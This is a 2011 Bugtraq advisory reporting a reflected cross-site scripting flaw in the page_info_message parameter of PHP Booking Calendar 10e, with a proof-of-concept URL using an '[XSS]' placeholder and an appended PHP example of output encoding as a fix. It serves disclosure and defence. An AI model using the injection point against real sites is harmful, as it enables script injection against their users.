Message-ID: <b9dcb7890ca34a661c373d930fdaa9b5@g13net.com>
Date: Sun, 18 Dec 2011 15:15:36 -0500
From: tom <tom@...net.com>
To: <bugtraq@...urityfocus.com>
Subject: PHP Booking Calendar 10e XSS

# Exploit Title: PHP Booking Calendar 10e XSS
# Date: 12/16/11
# Author: G13
# Software Link: http://sourceforge.net/projects/bookingcalendar/
# Version: 10e
# Category: webapps (php)
#
##### Vulnerability #####

The page_info_message variable in the details_view.php does not sanitize input. This is a reflective XSS attack.

##### Exploit #####

http://127.0.0.1/cal/details_view.php?event_id=1&date=2011-12-01&view=month&loc=loc1&page_info_message=[XSS]
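
The advisory does not include the affected source, so the following is an added example, not code from the advisory or from PHP Booking Calendar: one way a PHP page can echo a query parameter such as page_info_message with type checking, a length limit and HTML output encoding. The function name render_info_message, the 200-byte limit, the surrounding markup and the sample inputs are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical helper (not the project's code): builds the HTML emitted for
// the page_info_message query parameter named in the advisory.
function render_info_message(array $query, int $maxLen = 200): string
{
    $raw = $query['page_info_message'] ?? '';

    // PHP parses ?page_info_message[]=x into an array; accept strings only.
    if (!is_string($raw) || $raw === '') {
        return '';
    }

    // A status message has no reason to be long; refuse oversized values
    // instead of reflecting them. The limit is an assumed value.
    if (strlen($raw) > $maxLen) {
        return '';
    }

    // Encode for HTML element content. ENT_QUOTES covers both quote
    // characters, ENT_SUBSTITUTE replaces invalid UTF-8 sequences instead
    // of returning an empty string.
    $safe = htmlspecialchars($raw, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

    return '<p class="info">' . $safe . '</p>';
}

// Constructed sample inputs standing in for $_GET.
$samples = [
    ['page_info_message' => 'Booking saved'],
    ['page_info_message' => '<b>bold</b> & "quoted" text'],
    ['page_info_message' => ['unexpected', 'array']],
    ['page_info_message' => str_repeat('A', 500)],
];

foreach ($samples as $query) {
    // Markup in the second sample is printed as entities; the array and the
    // oversized value produce an empty string.
    var_export(render_info_message($query));
    echo PHP_EOL;
}
```

The encoding shown fits a value placed between HTML tags; a value written into an attribute, a URL or a script block needs the encoder for that context instead.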